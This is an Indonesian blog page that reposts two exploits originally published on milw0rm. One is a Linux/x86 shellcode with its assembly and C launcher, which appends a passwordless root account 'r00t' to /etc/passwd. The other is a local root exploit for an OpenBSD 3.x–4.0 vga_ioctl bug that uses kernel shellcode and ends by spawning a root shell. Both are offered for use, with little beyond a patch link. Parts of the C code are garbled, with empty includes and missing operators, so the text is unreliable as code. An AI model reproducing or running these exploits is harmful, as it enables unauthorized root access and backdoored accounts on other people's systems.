Tampilkan posting dengan label exploit. Tampilkan semua posting
Tampilkan posting dengan label exploit. Tampilkan semua posting

Exploit di linux/86  

at 2.18.2007 

/* By Kris Katterjohn 11/14/2006

 *

 * 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd

 *

 * for Linux/x86

 *

 *

 *

 * section .text

 *

 *      global _start

 *

 * _start:

 *

 * ; open("/etc//passwd", O_WRONLY | O_APPEND)

 *

 *      push byte 5

 *      pop eax

 *      xor ecx, ecx

 *      push ecx

 *      push 0x64777373

 *      push 0x61702f2f

 *      push 0x6374652f

 *      mov ebx, esp

 *      mov cx, 02001Q

 *      int 0x80

 *

 *      mov ebx, eax

 *

 * ; write(ebx, "r00t::0:0:::", 12)

 *

 *      push byte 4

 *      pop eax

 *      xor edx, edx

 *      push edx

 *      push 0x3a3a3a30

 *      push 0x3a303a3a

 *      push 0x74303072

 *      mov ecx, esp

 *      push byte 12

 *      pop edx

 *      int 0x80

 *

 * ; close(ebx)

 *

 *      push byte 6

 *      pop eax

 *      int 0x80

 *

 * ; exit()

 *

 *      push byte 1

 *      pop eax

 *      int 0x80

 */



main()

{

       char shellcode[] =

               "\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68"

               "\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66"

               "\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2"

               "\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68"

               "\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a"

               "\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80";



       (*(void (*)()) shellcode)();

}



// milw0rm.com [2006-11-17]


linux/x86 add root user r00t with no password to /etc/passwd 69 bytes



powered by performancing firefox

Read More...... Read More...

Posted in , , » Email Post » Link Posting » 0 Komentar »

AddThis Social Bookmark Button

Exploits di mesin OpenBSD   

/* 



Critical Security OpenBSD 3.x-4.0 vga_ioctl() root exploit 



Bug had been discovered by allmighty Ilja van Sprundel (ilja.netric.org) 

Some code had been stolen from noir's openbsd exploit sources 



Fix is available: 

ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch 



Critical Security [http://www.critical.lt], Lithuania, Vilnius, 2007 



Linkejimai neegzistuojancio fronto kariams ;] 

*/ 



#include  

#include  

#include  

#include  

#include  

#include  

#include  

#include  

#include  

#include  

#include  

#include  



#define TARGET1 "\x51\x47\x48\xd0"  /* 0xd0484751 obsd 4.0 generic i386*/ 

#define TARGET2 "\xa9\x42\x10\xd0"  /* 0xd01042a9 obsd 3.9 generic i386*/ 



char shellcode[]= 

"\x18\x00\x00\x00" 

"\x18\x00\x00\x00" 

"\x18\x00\x00\x00" /* some crap */ 

"\x18\x00\x00\x00" 

"\x18\x00\x00\x00" 



"\x18\x00\x00\x00" /* jmp 0x00000018 */ 



"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad" 

"\xde\xad\xde\xef\xbe\x90\x90\x90\x5f\x8b\x0f\x8b" /* p_cred  u_cred shellcode */ 

"\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89\x42\x04" 



"\xb8\x51\x47\x48\xd0" 

"\xff\xe0"; 



void usage() 

{ 

printf("Usage: crit_obsd_ex target\n\n"); 

printf("valid targets:\n"); 

printf("(1)\tobsd 4.0 generic i386\n"); 

printf("(2)\tobsd 3.9 generic i386\n\n"); 

exit(0); 

} 



void get_proc(pid_t pid, struct kinfo_proc *kp) 

{ 

   u_int arr[4], len; 



        arr[0] = CTL_KERN; 

        arr[1] = KERN_PROC; 

        arr[2] = KERN_PROC_PID; 

        arr[3] = pid; 

        len = sizeof(struct kinfo_proc); 

        if(sysctl(arr, 4, kp,  NULL, 0)  0) { 

                perror("sysctl"); 

                printf("this is an unexpected error, rerun!\n"); 

                exit(-1); 

        } 

} 



int main(int ac, char *av[]) 

{ 

        int i; 

        void *p; 

        int fd,failas; 

        u_long  pprocadr; 

        struct kinfo_proc kp; 



printf("\n+--------------------------------------------+\n"); 

printf("|     Critical Security local obsd root      |\n"); 

printf("+--------------------------------------------+\n\n"); 



if (ac usage(); 

if(atoi(av[1])==1) 

{ 

for(i=0;i 

} 

else if(atoi(av[1])==2) 

{ 

for(i=0;i 

} 

else {usage();} 



        get_proc((pid_t) getpid(),  

        pprocadr = (u_long) kp.kp_eproc.e_paddr; 



        shellcode[24+5] = pprocadr  0xff; 

        shellcode[24+6] = (pprocadr  8)  0xff; 

        shellcode[24+7] = (pprocadr  16)  0xff; 

        shellcode[24+8] = (pprocadr  24)  0xff; 



        printf("[~] shellcode size: %d\n",sizeof(shellcode)); 



        fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); 

        if(fd  0) 

                err(1, "open"); 



        write(fd, shellcode, sizeof(shellcode)); 

        if((lseek(fd, 0L, SEEK_SET))  0) 

                err(1, "lseek"); 



        p=mmap(0, sizeof(shellcode), PROT_READ|PROT_EXEC, MAP_FIXED, fd, 0); 

        if (p == MAP_FAILED) 

        err(1, "mmap"); 



        printf("[~] map addr: 0x%x\n",p); 

        printf("[~] exploiting...\n"); 

        failas = open(AGP_DEVICE, O_RDWR); 

        syscall(SYS_ioctl, failas, 0x80044103, NULL); 



        close(failas); 

        close(fd); 



        seteuid(0); 

        setuid(0); 

        printf("[~] uid: %d euid: %d gid: %d \n", getuid(), geteuid(),getgid()); 

        execl("/bin/sh", "cyber", NULL); 



}



// milw0rm.com [2007-01-07]




powered by performancing firefox

Read More...... Read More...

Posted in , » Email Post » Link Posting » 0 Komentar »

AddThis Social Bookmark Button
<< Posting Lebih Baru
Posting Lama >>
Halaman Muka